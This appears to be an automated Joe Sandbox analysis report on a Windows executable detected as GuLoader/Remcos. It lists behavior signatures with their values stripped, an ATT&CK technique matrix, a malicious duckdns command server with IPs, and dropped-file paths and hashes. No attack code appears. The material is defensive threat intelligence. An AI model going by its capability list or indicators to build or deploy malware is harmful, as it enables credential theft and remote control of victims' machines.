Source: | Thread sleep count: | Jump to behavior |
Source: | Code function: | 0_2_004027FB | |
Source: | Code function: | 0_2_00406393 | |
Source: | Code function: | 0_2_00405841 | |
Source: | Code function: | 7_2_242010F1 | |
Source: | Code function: | 7_2_24206580 | |
Source: | Code function: | 11_2_0040AE51 | |
Source: | Code function: | 12_2_00407EF8 | |
Source: | Code function: | 15_2_00407898 |
Source: | Code function: | 11_2_00418981 |
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-2864 | ||
Source: | API call chain: | graph_0-3043 | ||
Source: | API call chain: | graph_12-34115 |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 7_2_24208EC8 |
Source: | Code function: | 7_2_242060E2 |
Source: | Code function: | 11_2_0040DD85 |
Source: | Code function: | 11_2_004044A4 |
Source: | Code function: | 7_2_24204AB4 |
Source: | Code function: | 7_2_2420724E |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 7_2_242060E2 | |
Source: | Code function: | 7_2_24202639 | |
Source: | Code function: | 7_2_24202B1C |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 7_2_24202933 |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 7_2_24202264 |
Source: | Code function: | 12_2_004082CD |
Source: | Code function: | 0_2_00406072 |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Code function: | 12_2_004033F0 | |
Source: | Code function: | 12_2_00402DB3 | |
Source: | Code function: | 12_2_00402DB3 |
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 11 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 112 Command and Scripting Interpreter | Logon Script (Windows) | 212 Process Injection | 1 Software Packing | 2 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 1 Credentials In Files | 29 System Information Discovery | Distributed Component Object Model | 11 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 131 Security Software Discovery | SSH | 2 Clipboard Data | 213 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
34% | ReversingLabs | Win32.Trojan.GuLoader |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
34% | ReversingLabs | Win32.Trojan.GuLoader |
⊘No Antivirus matches
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
100% | URL Reputation | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | URL Reputation | phishing | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
learfo55ozj01.duckdns.org | 193.222.96.21 | true | true | unknown | |
geoplugin.net | 178.237.33.50 | true | false | unknown | |
ricohltd.top | 172.67.191.112 | true | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true | unknown | ||
true |
| unknown | |
false | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown | |||
false | high | |||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
true |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | unknown | |||
false | unknown | |||
false | high | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | unknown | |||
false | high | |||
false | high | |||
false | unknown | |||
false | high | |||
false | high | |||
false | unknown | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.67.191.112 | ricohltd.top | United States | 13335 | CLOUDFLARENETUS | false | |
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false | |
193.222.96.21 | learfo55ozj01.duckdns.org | Germany | 3303 | SWISSCOMSwisscomSwitzerlandLtdCH | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1428888 |
Start date and time: | 2024-04-19 19:19:07 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 9m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | z42MNA2024000000041-KWINTMADI-11310Y_K.exe |
Detection: | MAL |
Classification: | mal100.phis.troj.spyw.evad.winEXE@23/15@3/3 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 1436 because it is empty
- HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: z42MNA2024000000041-KWINTMADI-11310Y_K.exe
Time | Type | Description |
---|---|---|
19:20:07 | API Interceptor | |
19:21:30 | Autostart | |
19:21:40 | Autostart |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
172.67.191.112 | Get hash | malicious | GuLoader, Remcos | Browse | ||
178.237.33.50 | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
193.222.96.21 | Get hash | malicious | GuLoader, Remcos | Browse | ||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
learfo55ozj01.duckdns.org | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
geoplugin.net | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
ricohltd.top | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | HtmlDropper, HTMLPhisher | Browse |
| ||
Get hash | malicious | HtmlDropper, HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
SWISSCOMSwisscomSwitzerlandLtdCH | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
ATOM86-ASATOM86NL | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | CredGrabber, Meduza Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | CobaltStrike | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | FormBook | Browse |
|
⊘No context
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 963 |
Entropy (8bit): | 4.995620093649274 |
Encrypted: | false |
SSDEEP: | 12:tklzTknd6CsGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7Rr:qlkdRNuKyGX855vXhNlT3/77Kdxtro |
MD5: | 334018F02CE31BCBB4864D602B557FE5 |
SHA1: | C6DE43E8D6B5C026C0B0A56A898A3F00B282B881 |
SHA-256: | F70CE925C3923E25A5ADB7089E7EE752E771FBD073888ABFC426138C9094F1B3 |
SHA-512: | 31EF486A2F75226594BC553CBAFA84B645B6ED456F35F363C8EFD6229F4A731981CA1B7736CD4BD739DDCA885F068E96692BB16C7A906314B52220DC63E318BB |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8003 |
Entropy (8bit): | 4.838950934453595 |
Encrypted: | false |
SSDEEP: | 192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J |
MD5: | 4C24412D4F060F4632C0BD68CC9ECB54 |
SHA1: | 3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF |
SHA-256: | 411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE |
SHA-512: | 6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15728640 |
Entropy (8bit): | 0.10106922760070924 |
Encrypted: | false |
SSDEEP: | 1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W |
MD5: | 8474A17101F6B908E85D4EF5495DEF3C |
SHA1: | 7B9993C39B3879C85BF4F343E907B9EBBDB8D30F |
SHA-256: | 56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A |
SHA-512: | 056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2 |
Entropy (8bit): | 1.0 |
Encrypted: | false |
SSDEEP: | 3:Qn:Qn |
MD5: | F3B25701FE362EC84616A93A45CE9998 |
SHA1: | D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB |
SHA-256: | B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
SHA-512: | 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\z42MNA2024000000041-KWINTMADI-11310Y_K.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291878 |
Entropy (8bit): | 7.773215867160981 |
Encrypted: | false |
SSDEEP: | 6144:Bsp3y3At4DMaz2M9yt9pxGT+/QFiRlwKi8qOPysEnBAhg:BspC3AtyxH9yt9pe+/RRlOEhg |
MD5: | 45E8BC26B898A4FDAAF64D7D44E70741 |
SHA1: | E730F97F38ED7BD554FE48A62A0B2C574C64991D |
SHA-256: | 018324E40B8C32ECF23FA7C879D8400655FC1BA33147523F17D44FB6BD839CDE |
SHA-512: | 2A0524E6B27B79ACA9B8E6245673770FA34AAF6CF25D1D4F7CE7E704C8C82C55EB48C9306BCFDE944A22AB569B68AF1328B975D700BF78C6389BF1778DC9D862 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\australnegeren\indtgtskilden\Eksploderingers\Forstrkningsbjlken192.unu
Download File
Process: | C:\Users\user\Desktop\z42MNA2024000000041-KWINTMADI-11310Y_K.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 270968 |
Entropy (8bit): | 0.5600161318002418 |
Encrypted: | false |
SSDEEP: | 384:uj//kMorj9BFwQoDPymRRl/v+NnOrjKTIvfxZ5n62X3r73yPaEE691g0RZG4Ym3W:nTThom0t5nPwF8mLUAsdVJFyAfJ5T |
MD5: | 2C142689AB086848A623E76CDE26AC3A |
SHA1: | 18080E9D5D74228FA9EAA192BC7F9AC440CE4045 |
SHA-256: | C3DE11DDA04A9E157D73248F0A7D62160BED1498E196CC40F07BC66CBAFF0C2D |
SHA-512: | DF5DF262664ADAB5E95F96406C2C511ABD7842AE6D55B5DBAF00148939ED6FBF5C5A53B30B9A398FAC87579B21BA963E7051F1176244C0E4591BBDB3127EB174 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\australnegeren\indtgtskilden\Eksploderingers\Graasteneres.Sfa
Download File
Process: | C:\Users\user\Desktop\z42MNA2024000000041-KWINTMADI-11310Y_K.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 58202 |
Entropy (8bit): | 5.383431813471598 |
Encrypted: | false |
SSDEEP: | 1536:QPX6uN4p9wvQv2rkddGHMttJhIqZsoy+xuDcx:QSuN4+i20ttzIYsBVcx |
MD5: | 3AF25A5AF9271A50F9612E436103000C |
SHA1: | 9C2507BFDAABCFF84D9355B109FED3106A70976D |
SHA-256: | DEDC6344E4D80358FAF38231D58DBCA7B47212E78CD19FDE523FD309B9B5419B |
SHA-512: | 9D8DA2CCD98060B7B67F803877EA31FC52F3E16EEA5C5BD5824734DF11F0380AB2D668DA9E2ADD937D9C565E856236E1C665E972287AC1136AD0270C8F4A77B0 |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Local\australnegeren\indtgtskilden\Eksploderingers\Salvninger.ins
Download File
Process: | C:\Users\user\Desktop\z42MNA2024000000041-KWINTMADI-11310Y_K.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 894689 |
Entropy (8bit): | 0.5576705907171708 |
Encrypted: | false |
SSDEEP: | 768:rAoX6DearLKsHd0vEESCqVNBboGaRXHXHZ5uBSjNNVp8AyehAqQ1gVen2T39VQkl:QJC6kXiwqNyXc4dzMkbHUKN |
MD5: | 191C2CB812BD571A89D224035EA73B72 |
SHA1: | 6D72C8618B9B3EF01FA9CD98C8E264D397BFD3D4 |
SHA-256: | 230EE2C07FB19AAE1497F2E4035A1F9B953DB9779AD10D08E693F6314B5C02B1 |
SHA-512: | 68C922F0481D5291E228E7BB763EDF6D44090C2A2D87637C4FB265B0204292E55ED5051F34A4A8D567D6A687D6C76FC81FB8A9571CA71B71C82849E17096E517 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\australnegeren\indtgtskilden\Eksploderingers\retsvidenskabs.con
Download File
Process: | C:\Users\user\Desktop\z42MNA2024000000041-KWINTMADI-11310Y_K.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 484022 |
Entropy (8bit): | 0.5580860297647686 |
Encrypted: | false |
SSDEEP: | 768:yrPwvIq5yc5ng4qmodiN7aFgnVhowj60GzbU9h7bl1KJvS30VpKftZzbU5FXZxwr:Fnffissa |
MD5: | A8E6ED11F6EE0F833EE73A921DEA4795 |
SHA1: | 333F04418A2D04864E8A67830AC6D994DAE8B1C4 |
SHA-256: | BC5C1A61018BAF5098DCC8234E9E1171B4693EBCA24E59063B668492288BDCB9 |
SHA-512: | 9FD88E9B606817A894B45C599AEB1B53CDFDCB9363CF937C8EA9E6DE74E489B95406B92577C49EDE241D64D075CBE35ED5FFFF6B9C36F7323799F09A3F6DB9CC |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\z42MNA2024000000041-KWINTMADI-11310Y_K.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 446 |
Entropy (8bit): | 4.335049687045339 |
Encrypted: | false |
SSDEEP: | 12:L+FGOgTzJWqPG6mLOowrlbNL1xESJVuDWAzzHVTm7BKJVMmS0E:L6JYzJRG6XZRUST6LVZJV7E |
MD5: | 1F3881DF9847B90499F3685552F2EDA5 |
SHA1: | 1262CADE51D03D736786B02221AD7C05F16667F3 |
SHA-256: | 3BC7A57C04274331FE2A3EC4906BB68E662221EEBC050CDBDF2A15C3421427DB |
SHA-512: | 7D5A571FC5F0C67ABC2AAC48087F89ACAB2E878EC6588D243054DE3739D56FB379B330BA99A2AD761BF968CD497BB3872BC67FD8F697B285BD1AC8F326F9763D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\australnegeren\indtgtskilden\Incoagulability\z42MNA2024000000041-KWINTMADI-11310Y_K.exe
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 704480 |
Entropy (8bit): | 7.386362643464681 |
Encrypted: | false |
SSDEEP: | 12288:P/1iPIsV0cQPysVHoPftGlGlLjxVllYwrJOu8yR9OK8V9Uiyw0Fk:FiPI+QPyeHoXbdZlFYFQs9PX |
MD5: | DE3166B6CC1E83299FA1A4704C3CC674 |
SHA1: | E51BB6C564723D58E3BC5F39673B3D97F69FBA55 |
SHA-256: | 7A5984E2847646B6D3BB4075D210DE7672898FD21BF5AD0D5A373EE51544290F |
SHA-512: | 255B138F7750F17A52AFACB5F9D6D1D2FE93FDCC405102B1628EA9F545C6049DD90EE953F9856FD03B4C01A8070297D89B2899C484523D0D41B9DFCC5A6E4D4E |
Malicious: | true |
Antivirus: |
|
Preview: |
C:\Users\user\AppData\Local\australnegeren\indtgtskilden\Incoagulability\z42MNA2024000000041-KWINTMADI-11310Y_K.exe:Zone.Identifier
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.341937514109179 |
Encrypted: | false |
SSDEEP: | 6:6l+F8/fZb5YcIeeDAlKe5q1gWAAe5q1gWAv:6l//hDec8e5BWFe5BW+ |
MD5: | 6245376B46EAA75B51D17CDA4A5339DA |
SHA1: | C6C9B3E38C193C61961DA129B60AD0C3EA9767C5 |
SHA-256: | 51DF06D22243469D9603C43774FDA1CDE422DDB1A5B6325FEEE0486402D57D80 |
SHA-512: | EE5D593461F958DA4D710F5826C89183BC0BBBB327EB35FFF3A0A5D445F70EDB8B91E3BFD2C86819DA9EFD95277B85C672DCE93FCAFADACC851B437AC0D871AC |
Malicious: | true |
Yara Hits: |
|
Preview: |
File type: | |
Entropy (8bit): | 7.386362643464681 |
TrID: |
|
File name: | z42MNA2024000000041-KWINTMADI-11310Y_K.exe |
File size: | 704'480 bytes |
MD5: | de3166b6cc1e83299fa1a4704c3cc674 |
SHA1: | e51bb6c564723d58e3bc5f39673b3d97f69fba55 |
SHA256: | 7a5984e2847646b6d3bb4075d210de7672898fd21bf5ad0d5a373ee51544290f |
SHA512: | 255b138f7750f17a52afacb5f9d6d1d2fe93fdcc405102b1628ea9f545c6049dd90ee953f9856fd03b4c01a8070297d89b2899c484523d0d41b9dfcc5a6e4d4e |
